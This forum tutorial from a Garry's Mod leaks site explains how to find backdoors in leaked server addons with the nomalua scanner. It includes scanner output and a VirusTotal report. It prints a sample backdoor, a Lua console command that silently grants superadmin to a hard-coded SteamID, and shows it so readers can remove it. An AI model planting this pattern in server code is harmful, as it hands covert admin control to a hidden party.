Garry's Mod Leaks

- How To Look For Backdoors On Leaks -

Submitted by TupacAmaruShakur, , Thread ID: 113573

Thread Closed
28-12-2018, 07:34 AM
This post was last modified: 28-12-2018, 08:03 AM by TupacAmaruShakur
#1
Hello,

I present this tutorial that will help you find if your server suffers a backdoor, an addon can be infected and infected people who can put superadmin on your server or do more malicious damage ..
To remind that a person can not access your FTP if it has not given the access yourself.

Step 1: Find the backdoor

-You Will first download this addon and put it in the addon of your server on the

1-[/url][url=https://github.com/THABBuzzkill/nomalua/archive/master.zip]Click Me And I Will Download What You Need!


Where the download came from and more instructions

2-

-Add the files/addons you want scanned in your addons folder
-Then You restart your server and connect it once it reboots.
-Once Your server you type in your console (console ingame):

nomalua_scan


-Your Server will crash during scanning, ie 10-15 seconds but does not crash so stay on.
-After The crash of 10-15 seconds re-open your console (in-game) and you'll observe something like:


1 - FILESYS (Reading file contents) addons/smugglesystem/lua/autorun/server/smug_server.lua:138 local PositionFile = file.Read("craphead_scripts/smuggle_system/".. string.lower(game.GetMap()) .."/smuggletruck_location.txt", "DATA")
1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" )
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt")
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" )
4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 Guillaume (STEAM_0:0:71249946)
1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
[size=85][font=Helvetica Neue, Helvetica, Arial, sans-serif]2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size]
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:62 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)


We see many things .

For example an infected addon you will see something like that :

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


The "if (ply: Unique ID () ==" STEAM_0: 1: 64045285 ") then" is clearly a backdoor.
Look at the lines 'AUTHENT (Presence of Steam ID)' and if[Image: smile.png]

Step 2: Remove backdoor

We will take that line:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


To remove the infected you in the way you have given: addons / prisonrptimer / lua / autorun and you open prison_timer.lua then you go on line 101.
We have this line 101 and you just have to remove the person like that will not have the opportunity to do things:

concommand.Add( "EFM", function(ply)
if ( ply:SteamID() == "STEAM_0:1:64045285") then
RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
else
ply
:ChatPrint("Rcon commands Enable, " .. ply:Name() .. ".")
end
end)


I hope i helped you with this!


Scan and other information

SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
File name: detect.zip
Detection ratio: 0 / 54
Analysis date: 2016-07-21 06:37:35 UTC ( 2 minutes ago )


Contained files
This file is a compressed stream containing 11 files.
[+] nomalua/lua/autorun/init.lua unknown 245 Bytes
[+] nomalua/lua/cl_nomalua.lua unknown 191 Bytes
[+] nomalua/lua/sh_nomalua.lua unknown 109 Bytes
[+] nomalua/lua/sv_nomalua.lua unknown 3451 Bytes
[+] nomalua/lua/sv_nomalua_checkdefs.lua unknown 1950 Bytes
[+] nomalua/lua/sv_nomalua_utils.lua unknown 2137 Bytes
[+] nomalua/lua/sv_nomalua_whitelist.lua unknown 1188 Bytes
[+] nomalua/readme.txt unknown 6395 Bytes
[+] nomalua/ directory 0 Bytes
[+] nomalua/lua/ directory 0 Bytes
Show all
Compression metadata
Contained files11
Uncompressed size15666
Highest datetime2015-04-21 10:27:54
Lowest datetime2015-04-20 17:44:54
Contained files by extension
lua7
txt1
Contained files by type
unknown8
directory3
ExifTool file metadata
MIMETypeapplication/zip
ZipRequiredVersion20
ZipCRC0x00000000
FileTypeZIP
ZipCompressionNone
ZipUncompressedSize0
ZipCompressedSize0
FileTypeExtensionzip
ZipFileNamenomalua/
ZipBitFlag0
ZipModifyDate2015:04:21 10:27:26

MD5 80d8970db9c26c7fa0c15ad9ac794322
SHA1
9e09f2a7e850250de685b2eb0238de9eebad1e3f
SHA256
211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
ssdeep192
:B9pCeI4k44AcA5xky4litNWmoxaoVTGFnPZ9yUYTc+X:B94Ok4vcAJmm9ogzy7I+X
File size 8.1 KB ( 8302 bytes )
File type ZIP
Magic literalZip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
Tagszip
VirusTotal metadata
First submission 2016-07-21 06:37:35 UTC ( 2 minutes ago )
Last submission 2016-07-21 06:37:35 UTC ( 2 minutes ago )
File names detect.zip




I HAVE ANOTHER SCANNER ON THE WAY, BOTH ARE GOOD, SO IT'S OPINION. TELL ME WHAT YOU THINK!
This hidden content has been reported as still working 0 times this month.
1 times in total
[Image: giphy.gif]

Users browsing this thread: 4 Guest(s)